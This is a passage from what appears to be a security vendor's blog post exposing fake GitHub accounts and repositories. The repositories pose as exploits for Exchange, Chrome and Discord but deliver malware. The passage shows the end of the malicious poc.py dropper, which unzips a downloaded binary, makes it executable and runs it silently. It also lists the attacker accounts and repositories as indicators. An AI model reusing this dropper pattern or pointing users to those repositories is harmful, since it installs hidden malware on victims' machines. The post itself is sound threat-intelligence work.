</span></span><span class="line" line="27"><span class="ct-836158">            zf.extractall(os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name))
</span></span><span class="line" line="28"><span class="ct-836158">            zf.close()
</span></span><span class="line" line="29"><span class="ct-836158">            st </span><span class="ct-794887">=</span><span class="ct-836158"> os.stat(os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name, name))
</span></span><span class="line" line="30"><span class="ct-836158">            os.chmod(os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name, name), st.st_mode </span><span class="ct-794887">|</span><span class="ct-836158"> stat.</span><span class="ct-360247">S_IEXEC</span><span class="ct-836158">)
</span></span><span class="line" line="31"><span class="ct-836158">            subprocess.Popen([</span><span class="ct-169668">&quot;/bin/bash&quot;</span><span class="ct-836158">, </span><span class="ct-169668">&quot;-c&quot;</span><span class="ct-836158">, os.path.join(</span><span class="ct-169668">&quot;/home/&quot;</span><span class="ct-836158"> </span><span class="ct-794887">+</span><span class="ct-836158"> os.environ[</span><span class="ct-169668">&quot;USERNAME&quot;</span><span class="ct-836158">] </span><span class="ct-794887">+</span><span class="ct-836158"> </span><span class="ct-169668">&quot;/.local/share&quot;</span><span class="ct-836158">, name, name)], </span><span class="ct-402719">start_new_session</span><span class="ct-794887">=</span><span class="ct-360247">True</span><span class="ct-836158">, </span><span class="ct-402719">stdout</span><span class="ct-794887">=</span><span class="ct-836158">subprocess.</span><span class="ct-360247">DEVNULL</span><span class="ct-836158">, </span><span class="ct-402719">stderr</span><span class="ct-794887">=</span><span class="ct-836158">subprocess.</span><span class="ct-360247">STDOUT</span><span class="ct-836158">)
</span></span><span class="line" line="32"><span>
</span></span><span class="line" line="33"><span>
</span></span><span class="line" line="34"><span class="ct-836158">    main()</span></span></code></pre><!--]--><p><!--[-->Above, <code><!--[-->poc.py<!--]--></code> downloads one of two zip files. <code><!--[-->cveslinux.zip<!--]--></code> or <code><!--[-->cveswindows.zip<!--]--></code> are fetched from GitHub, unzipped, written to disk, and executed. The Windows binary has a very high detection rate on VirusTotal (<a href="https://www.virustotal.com/gui/file/777c9220670025a487f4e853987df0482fbd545189137d58a60d4ab37c1cfbb4" rel="nofollow"><!--[-->43/71<!--]--></a>). The Linux binary much less so (<a href="https://www.virustotal.com/gui/file/ba4be87b3747e6c009c3aa9c9f28ce4331cd3fe2bd0d332283f226d747698733/detection" rel="nofollow"><!--[-->3/62<!--]--></a>), but it contains some very obvious strings indicating its nature.<!--]--></p><p><!--[--><img src="/blog/fake-repos-deliver-malicious-implant/ghidra.png" alt="Repo Layout"><!--]--></p><p><!--[-->The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware. It’s unclear if they have been successful, but given that they’ve continued to pursue this avenue of attacks, it seems they believe they <em><!--[-->will<!--]--></em> be successful.<!--]--></p><p><!--[-->It isn’t clear if this is a single individual with too much time on their hands, or something more advanced like the campaign uncovered by <a href="https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/" rel="nofollow"><!--[-->Google TAG in January 2021<!--]--></a>. Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing and don’t use anything you don’t understand.<!--]--></p><p><!--[-->If you have engaged with any of the following accounts, consider the possibility that you’ve been compromised.<!--]--></p><h3 id="github-accounts"><a href="#github-accounts"><!--[-->GitHub Accounts<!--]--></a></h3><ol><!--[--><li><!--[--><a href="https://github.com/AKuzmanHSCS" rel="nofollow"><!--[-->https://github.com/AKuzmanHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/RShahHSCS" rel="nofollow"><!--[-->https://github.com/RShahHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/BAdithyaHSCS" rel="nofollow"><!--[-->https://github.com/BAdithyaHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/DLandonHSCS" rel="nofollow"><!--[-->https://github.com/DLandonHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/MHadzicHSCS" rel="nofollow"><!--[-->https://github.com/MHadzicHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/GSandersonHSCS" rel="nofollow"><!--[-->https://github.com/GSandersonHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/SSankkarHSCS" rel="nofollow"><!--[-->https://github.com/SSankkarHSCS<!--]--></a><!--]--></li><!--]--></ol><h3 id="malicious-repositories"><a href="#malicious-repositories"><!--[-->Malicious Repositories<!--]--></a></h3><ol><!--[--><li><!--[--><a href="https://github.com/AKuzmanHSCS/Microsoft-Exchange-RCE" rel="nofollow"><!--[-->https://github.com/AKuzmanHSCS/Microsoft-Exchange-RCE<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/MHadzicHSCS/Chrome-0-day" rel="nofollow"><!--[-->https://github.com/MHadzicHSCS/Chrome-0-day<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/GSandersonHSCS/discord-0-day-fix" rel="nofollow"><!--[-->https://github.com/GSandersonHSCS/discord-0-day-fix<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/BAdithyaHSCS/Exchange-0-Day" rel="nofollow"><!--[-->https://github.com/BAdithyaHSCS/Exchange-0-Day<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/RShahHSCS/Discord-0-Day-Exploit" rel="nofollow"><!--[-->https://github.com/RShahHSCS/Discord-0-Day-Exploit<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/DLandonHSCS/Discord-RCE" rel="nofollow"><!--[-->https://github.com/DLandonHSCS/Discord-RCE<!--]--></a><!--]--></li><li><!--[--><a href="https://github.com/SSankkarHSCS/Chromium-0-Day" rel="nofollow"><!--[-->https://github.com/SSankkarHSCS/Chromium-0-Day<!--]--></a><!--]--></li><!--]--></ol><h3 id="twitter-accounts"><a href="#twitter-accounts"><!--[-->Twitter Accounts<!--]--></a></h3><ol><!--[--><li><!--[--><a href="https://twitter.com/AKuzmanHSCS" rel="nofollow"><!--[-->https://twitter.com/AKuzmanHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://twitter.com/DLandonHSCS" rel="nofollow"><!--[-->https://twitter.com/DLandonHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://twitter.com/GSandersonHSCS" rel="nofollow"><!--[-->https://twitter.com/GSandersonHSCS<!--]--></a><!--]--></li><li><!--[--><a href="https://twitter.com/MHadzicHSCS" rel="nofollow"><!--[-->https://twitter.com/MHadzicHSCS<!--]--></a><!--]--></li><!--]--></ol><style>.ct-794887{color:#CF222E;}
.dark .ct-794887{color:#FF7B72;}
.sepia .ct-794887{color:#F92672;}
.ct-836158{color:#24292F;}
.dark .ct-836158{color:#C9D1D9;}
.sepia .ct-836158{color:#F8F8F2;}
.ct-869604{color:#0550AE;}
.dark .ct-869604{color:#79C0FF;}
.sepia .ct-869604{color:#F8F8F2;}
.ct-169668{color:#0A3069;}
.dark .ct-169668{color:#A5D6FF;}
.sepia .ct-169668{color:#E6DB74;}
.ct-363298{color:#0550AE;}
.dark .ct-363298{color:#79C0FF;}
.sepia .ct-363298{color:#66D9EF;}
.ct-402719{color:#953800;}
.dark .ct-402719{color:#FFA657;}
.sepia .ct-402719{color:#FD971F;font-style:italic;}
.ct-854774{color:#CF222E;}
.dark .ct-854774{color:#FF7B72;}
.sepia .ct-854774{color:#66D9EF;font-style:italic;}
.ct-360247{color:#0550AE;}
.dark .ct-360247{color:#79C0FF;}
.sepia .ct-360247{color:#AE81FF;}</style></div><!--]--></main></div></div><!--]--></div><!--]--><!----></div><div><div class="lg:max-w-screen-xl mx-auto px-4 md:px-8 lg:px-16 relative py-24"><!--[--><!--]--></div></div><footer aria-labelledby="footer-heading" class="py-16"><div id="footer-heading" class="sr-only">Footer</div><div class="lg:max-w-screen-xl mx-auto px-4 md:px-8 lg:px-16 relative"><!--[--><div class="grid grid-cols-1 lg:grid-cols-4"><div class="px-4 flex-1 h-full flex flex-col justify-between text-gray-400"><a href="/" class="flex transition-colors duration-200 overflow-hidden gray w-40 h-10 mb-6 lg:mb-0" aria-label="Logo"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 800.5 160.35"><path d="M254.12,44.23l-25.3,58.09-25.07-58.09h-15.22l32.95,75.36h13.79l32.87-75.36h-14.01Zm61.05,17.88v29.01c0,11.51-6.36,17.35-15.75,17.35-8.48,0-13.41-4.92-13.41-15.38v-30.98h-13.48v32.8c0,17.34,10,25.45,24.77,25.45,7.42,0,14.24-2.8,18.56-8.1v7.35h12.8V62.11h-13.48Zm31.13,57.49h13.48V39.69h-13.48V119.6Zm63.7-58.17c-8.33,0-15.38,2.8-19.77,8.1v-7.42h-12.8v57.49h13.41v-29.09c0-11.51,6.51-17.35,16.06-17.35,8.63,0,13.71,4.92,13.71,15.15v31.28h13.41v-32.95c0-17.35-10.23-25.22-24.01-25.22h0Zm77.33,59.23c12.42,0,22.95-4.39,29.92-12.57l-9.01-8.63c-5.53,5.98-12.27,8.94-20.15,8.94-15.6,0-26.89-10.98-26.89-26.51s11.29-26.51,26.89-26.51c7.88,0,14.62,2.95,20.15,8.86l9.01-8.48c-6.97-8.18-17.5-12.65-29.84-12.65-23.1,0-40.37,16.28-40.37,38.78s17.27,38.78,40.3,38.78h0Zm74.76-59.23c-8.03,0-14.77,2.58-19.16,7.35v-29.09h-13.48V119.6h13.48v-29.09c0-11.51,6.44-17.35,15.98-17.35,8.63,0,13.71,4.92,13.71,15.15v31.28h13.48v-32.95c0-17.35-10.23-25.22-24.01-25.22h0Zm95.66,29.69c0-17.95-12.27-29.69-29.01-29.69s-29.77,12.27-29.77,29.39,12.5,29.54,31.81,29.54c9.85,0,17.95-3.26,23.1-9.39l-7.2-8.33c-4.09,4.24-9.16,6.29-15.6,6.29-10,0-17.04-5.38-18.63-13.79h45.14c.08-1.29,.15-2.88,.15-4.01h0Zm-29.01-18.94c8.79,0,15.15,5.76,16.21,14.01h-32.65c1.36-8.41,7.65-14.01,16.44-14.01h0Zm68.32,48.17c11.21,0,20.15-4.85,24.54-13.48l-10.3-6.06c-3.48,5.53-8.63,7.95-14.32,7.95-9.92,0-17.5-6.74-17.5-17.95s7.57-17.95,17.5-17.95c5.68,0,10.83,2.42,14.32,7.95l10.3-6.06c-4.39-8.71-13.33-13.33-24.54-13.33-18.18,0-31.13,12.19-31.13,29.39s12.95,29.54,31.13,29.54h0Zm79.08-.76h16.36l-26.28-33.4,24.01-24.09h-16.13l-27.95,25.83V39.69h-13.41V119.6h13.41v-15.22l10.07-9.47,19.92,24.69Z" class="fill-current text-gray-800 dark:text-white"></path><path d="M.83,68.4c-.53,3.86-.83,7.8-.83,11.74,0,19.24,6.74,36.89,18.1,50.75l9.47-10.68c-8.48-11.06-13.48-25-13.48-40.07,0-4.01,.38-7.88,1.06-11.74,.68-4.17,1.89-8.26,3.41-12.12,3.56-9.24,9.09-17.42,16.13-24.09,11.89-11.21,27.87-18.1,45.45-18.1,12.57,0,24.31,3.48,34.24,9.54l-9.54,10.68c-7.35-3.94-15.75-6.14-24.69-6.14-13.94,0-26.66,5.53-36.05,14.47-7.12,6.89-12.27,15.75-14.62,25.75h37.8l3.48,3.86,9.39,10.53h0l12.95-14.39,23.1-25.75,9.47-10.45,9.39-10.45c-3.48-3.26-7.12-6.14-11.13-8.71C111.34,4.77,96.34,0,80.14,0,58.93,0,39.61,8.26,25.3,21.74c-6.97,6.59-12.8,14.39-17.12,23.03-3.56,7.35-6.06,15.3-7.35,23.63H.83Zm36.51,62.11l-9.47,10.45c7.27,6.21,15.68,11.21,24.77,14.54,4.92,1.74,10.07,3.11,15.38,3.94,4.01,.61,8.03,.91,12.12,.91,9.7,0,18.94-1.74,27.49-4.85,9.16-3.33,17.57-8.33,24.77-14.54,17.12-14.69,27.95-36.51,27.95-60.82,0-3.94-.3-7.88-.91-11.74-.38-2.95-.98-5.91-1.74-8.71-1.36-5.23-3.26-10.15-5.6-14.92l-10.3,11.51-10.91,12.12v.08l-31.81,35.37-18.94,21.06-18.86-21.06-9.47-10.53-22.34-24.84c-.83,3.71-1.29,7.65-1.29,11.66,0,10.91,3.33,21.06,9.01,29.39,2.73,3.94,5.91,7.42,9.54,10.45,7.5,6.36,16.89,10.6,27.19,11.82,2.05,.3,4.17,.38,6.21,.38s4.24-.08,6.29-.38c2.65-.3,5.3-.83,7.8-1.51,7.2-2.05,13.79-5.6,19.39-10.3,9.24-7.73,15.75-18.71,17.88-31.13l14.39-16.06c.23,2.42,.38,4.92,.38,7.35,0,20.15-9.01,38.25-23.25,50.37-7.35,6.21-16.06,10.91-25.68,13.48-5.45,1.51-11.21,2.27-17.19,2.27h-.23c-5.91,0-11.51-.83-16.89-2.27-9.62-2.58-18.33-7.27-25.68-13.48h0Z" class="fill-current text-logo-a dark:text-white"></path></svg></a><span text-gray-500>VulnCheck helps organizations outpace adversaries with vulnerability intelligence that predicts avenues of attack with speed and accuracy.</span><span un-text="xs gray-400 dark:gray-600" mt-4>© 2023 VulnCheck Inc.</span></div><div class="px-4"><!--[--><div class="font-semibold text-gray-600 dark:text-gray-400 mb-2 mt-8 md:mt-0">Products</div><ul><!--[--><li><a href="/product/vulnerability-intelligence" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M18.68 12.32a4.49 4.49 0 0 0-6.36.01a4.49 4.49 0 0 0 0 6.36a4.508 4.508 0 0 0 5.57.63L21 22.39L22.39 21l-3.09-3.11c1.13-1.77.87-4.09-.62-5.57m-1.41 4.95c-.98.98-2.56.97-3.54 0c-.97-.98-.97-2.56.01-3.54c.97-.97 2.55-.97 3.53 0c.97.98.97 2.56 0 3.54M10.9 20.1a6.527 6.527 0 0 1-1.48-2.32C6.27 17.25 4 15.76 4 14v3c0 2.21 3.58 4 8 4c-.4-.26-.77-.56-1.1-.9M4 9v3c0 1.68 2.07 3.12 5 3.7v-.2c0-.93.2-1.85.58-2.69C6.34 12.3 4 10.79 4 9m8-6C7.58 3 4 4.79 4 7c0 2 3 3.68 6.85 4h.05c1.2-1.26 2.86-2 4.6-2c.91 0 1.81.19 2.64.56A3.215 3.215 0 0 0 20 7c0-2.21-3.58-4-8-4Z"/></svg><span>Vulnerability Intelligence</span></a></li><li><a href="/product/exploit-intelligence" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M12 2C5.505 2 2 6.637 2 11c0 2.129 1.009 3.979 3 5.508V21h3v-3h2v3h4v-3h2v3h3v-4.493c1.991-1.528 3-3.379 3-5.507c0-4.363-3.505-9-10-9zM8 13c-1.121 0-2-1.098-2-2.5S6.879 8 8 8s2 1.098 2 2.5S9.121 13 8 13zm8 0c-1.121 0-2-1.098-2-2.5S14.879 8 16 8s2 1.098 2 2.5s-.879 2.5-2 2.5z"/></svg><span>Exploit Intelligence</span></a></li><li><a href="/product/initial-access-intelligence" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M12 3c-1.11 0-2 .89-2 2H3v14H2v2h20v-2h-1V5c0-1.11-.89-2-2-2h-7m0 2h7v14h-7V5m-7 6h2v2H5v-2Z"/></svg><span>Initial Access Intelligence</span></a></li><!--]--></ul><!--]--><!--[--><div class="lg:mt-8 font-semibold text-gray-600 dark:text-gray-400 mb-2 mt-8 md:mt-0">Company</div><ul><!--[--><li><a href="/company/investors" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M12 11a5 5 0 0 1 5 5v6h-2v-6a3 3 0 0 0-2.824-2.995L12 13a3 3 0 0 0-2.995 2.824L9 16v6H7v-6a5 5 0 0 1 5-5Zm-6.5 3c.279 0 .55.033.81.094a5.948 5.948 0 0 0-.301 1.575L6 16v.086a1.493 1.493 0 0 0-.356-.08L5.5 16a1.5 1.5 0 0 0-1.493 1.355L4 17.5V22H2v-4.5A3.5 3.5 0 0 1 5.5 14Zm13 0a3.5 3.5 0 0 1 3.5 3.5V22h-2v-4.5a1.5 1.5 0 0 0-1.355-1.493L18.5 16c-.175 0-.343.03-.5.085V16c0-.666-.108-1.306-.308-1.904c.258-.063.53-.096.808-.096Zm-13-6a2.5 2.5 0 1 1 0 5a2.5 2.5 0 0 1 0-5Zm13 0a2.5 2.5 0 1 1 0 5a2.5 2.5 0 0 1 0-5Zm-13 2a.5.5 0 1 0 0 1a.5.5 0 0 0 0-1Zm13 0a.5.5 0 1 0 0 1a.5.5 0 0 0 0-1ZM12 2a4 4 0 1 1 0 8a4 4 0 0 1 0-8Zm0 2a2 2 0 1 0 0 4a2 2 0 0 0 0-4Z"/></svg><span>Investors</span></a></li><li><a href="/press" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M6 17h5v-2H6v2Zm10 0h2v-2h-2v2ZM6 13h5v-2H6v2Zm10 0h2V7h-2v6ZM6 9h5V7H6v2ZM4 21q-.825 0-1.413-.588T2 19V5q0-.825.588-1.413T4 3h16q.825 0 1.413.588T22 5v14q0 .825-.588 1.413T20 21H4Z"/></svg><span>Press Releases</span></a></li><li><a href="/blog" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M20 5v14H4V5h16m0-2H4c-1.11 0-2 .89-2 2v14c0 1.11.89 2 2 2h16c1.11 0 2-.89 2-2V5c0-1.11-.89-2-2-2m-2 12H6v2h12v-2m-8-8H6v6h4V7m2 2h6V7h-6v2m6 2h-6v2h6v-2Z"/></svg><span>Blog</span></a></li><li><a href="/news" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M4 21q-.825 0-1.413-.588T2 19V3l1.675 1.675L5.325 3L7 4.675L8.675 3l1.65 1.675L12 3l1.675 1.675L15.325 3L17 4.675L18.675 3l1.65 1.675L22 3v16q0 .825-.587 1.413T20 21H4Zm0-2h7v-6H4v6Zm9 0h7v-2h-7v2Zm0-4h7v-2h-7v2Zm-9-4h16V8H4v3Z"/></svg><span>News</span></a></li><li><a href="/events" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M17 10H7v2h10v-2zm2-7h-1V1h-2v2H8V1H6v2H5c-1.11 0-1.99.9-1.99 2L3 19a2 2 0 0 0 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm0 16H5V8h14v11zm-5-5H7v2h7v-2z"/></svg><span>Events</span></a></li><!--]--></ul><!--]--></div><div class="px-4"><!--[--><div class="font-semibold text-gray-600 dark:text-gray-400 mb-2 mt-8 md:mt-0">Resources</div><ul><!--[--><li><a href="https://docs.vulncheck.com/docs" rel="noopener noreferrer" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path d="M5 3h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2zm2 4v2h10V7H7zm0 4v2h10v-2H7zm0 4v2h7v-2H7z" fill="currentColor"/></svg><span>Tutorials</span></a></li><li><a href="https://docs.vulncheck.com/reference" rel="noopener noreferrer" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M5 3h2v2H5v5a2 2 0 0 1-2 2a2 2 0 0 1 2 2v5h2v2H5c-1.07-.27-2-.9-2-2v-4a2 2 0 0 0-2-2H0v-2h1a2 2 0 0 0 2-2V5a2 2 0 0 1 2-2m14 0a2 2 0 0 1 2 2v4a2 2 0 0 0 2 2h1v2h-1a2 2 0 0 0-2 2v4a2 2 0 0 1-2 2h-2v-2h2v-5a2 2 0 0 1 2-2a2 2 0 0 1-2-2V5h-2V3h2m-7 12a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1m-4 0a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1m8 0a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1Z"/></svg><span>API</span></a></li><li><a href="https://docs.vulncheck.com/docs/vulncheck-glossary" rel="noopener noreferrer" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M21 5c-1.11-.35-2.33-.5-3.5-.5c-1.95 0-4.05.4-5.5 1.5c-1.45-1.1-3.55-1.5-5.5-1.5S2.45 4.9 1 6v14.65c0 .25.25.5.5.5c.1 0 .15-.05.25-.05C3.1 20.45 5.05 20 6.5 20c1.95 0 4.05.4 5.5 1.5c1.35-.85 3.8-1.5 5.5-1.5c1.65 0 3.35.3 4.75 1.05c.1.05.15.05.25.05c.25 0 .5-.25.5-.5V6c-.6-.45-1.25-.75-2-1zm0 13.5c-1.1-.35-2.3-.5-3.5-.5c-1.7 0-4.15.65-5.5 1.5V8c1.35-.85 3.8-1.5 5.5-1.5c1.2 0 2.4.15 3.5.5v11.5z"/><path fill="currentColor" d="M17.5 10.5c.88 0 1.73.09 2.5.26V9.24c-.79-.15-1.64-.24-2.5-.24c-1.7 0-3.24.29-4.5.83v1.66c1.13-.64 2.7-.99 4.5-.99zM13 12.49v1.66c1.13-.64 2.7-.99 4.5-.99c.88 0 1.73.09 2.5.26V11.9c-.79-.15-1.64-.24-2.5-.24c-1.7 0-3.24.3-4.5.83zm4.5 1.84c-1.7 0-3.24.29-4.5.83v1.66c1.13-.64 2.7-.99 4.5-.99c.88 0 1.73.09 2.5.26v-1.52c-.79-.16-1.64-.24-2.5-.24z"/></svg><span>Glossary</span></a></li><li><a href="https://docs.vulncheck.com/docs/vulncheck-customer-support" rel="noopener noreferrer" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10s10-4.48 10-10S17.52 2 12 2zm7.46 7.12l-2.78 1.15a4.982 4.982 0 0 0-2.95-2.94l1.15-2.78c2.1.8 3.77 2.47 4.58 4.57zM12 15c-1.66 0-3-1.34-3-3s1.34-3 3-3s3 1.34 3 3s-1.34 3-3 3zM9.13 4.54l1.17 2.78a5 5 0 0 0-2.98 2.97L4.54 9.13a7.984 7.984 0 0 1 4.59-4.59zM4.54 14.87l2.78-1.15a4.968 4.968 0 0 0 2.97 2.96l-1.17 2.78a7.996 7.996 0 0 1-4.58-4.59zm10.34 4.59l-1.15-2.78a4.978 4.978 0 0 0 2.95-2.97l2.78 1.17a8.007 8.007 0 0 1-4.58 4.58z"/></svg><span>Contact Support</span></a></li><!--]--></ul><!--]--><!--[--><div class="lg:mt-8 font-semibold text-gray-600 dark:text-gray-400 mb-2 mt-8 md:mt-0">Community</div><ul><!--[--><li><a href="/xdb" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M11 7.83A3 3 0 0 1 9 5a3 3 0 0 1 3-3a3 3 0 0 1 3 3c0 1.31-.84 2.42-2 2.83v2.81a3.66 3.66 0 0 0-2 0V7.83m7.3 13.27a2.989 2.989 0 0 1-1.46-3.14l-2.44-1.41c.48-.46.84-1.05 1-1.73l2.44 1.41c.94-.81 2.32-.97 3.45-.32c1.44.83 1.93 2.66 1.1 4.09a2.987 2.987 0 0 1-4.09 1.1M2.7 15.9c1.13-.65 2.51-.48 3.45.32l2.45-1.41c.16.69.51 1.27 1 1.73l-2.45 1.41c.23 1.22-.32 2.5-1.45 3.15c-1.44.83-3.27.34-4.1-1.1a2.999 2.999 0 0 1 1.1-4.1M14 14a2 2 0 0 1-2 2a2 2 0 0 1-2-2a2 2 0 0 1 2-2a2 2 0 0 1 2 2m3 0l-.03.57l-1.47-.86c-.1-1.07-.67-2-1.5-2.59V9.41c1.77.78 3 2.54 3 4.59m-2.03 4.03c-.83.61-1.86.97-2.97.97s-2.14-.36-2.97-1l1.47-.83c.46.21.97.33 1.5.33s1.03-.12 1.5-.33l1.47.86m-7.94-3.47L7 14c0-2.05 1.23-3.81 3-4.58v1.71c-.83.58-1.4 1.51-1.5 2.57l-1.47.86Z"/></svg><span>VulnCheck XDB</span></a></li><li><a href="/advisories" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="none" stroke="currentColor" stroke-width="2" d="M12 0v24V0ZM0 12h24H0Zm17 0c0-2.757-2.243-5-5-5s-5 2.243-5 5s2.243 5 5 5s5-2.243 5-5Zm-5 9c-4.962 0-9-4.037-9-9s4.038-9 9-9s9 4.037 9 9s-4.038 9-9 9Z"/></svg><span>VulnCheck Advisories</span></a></li><li><a href="/advisories/report" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" 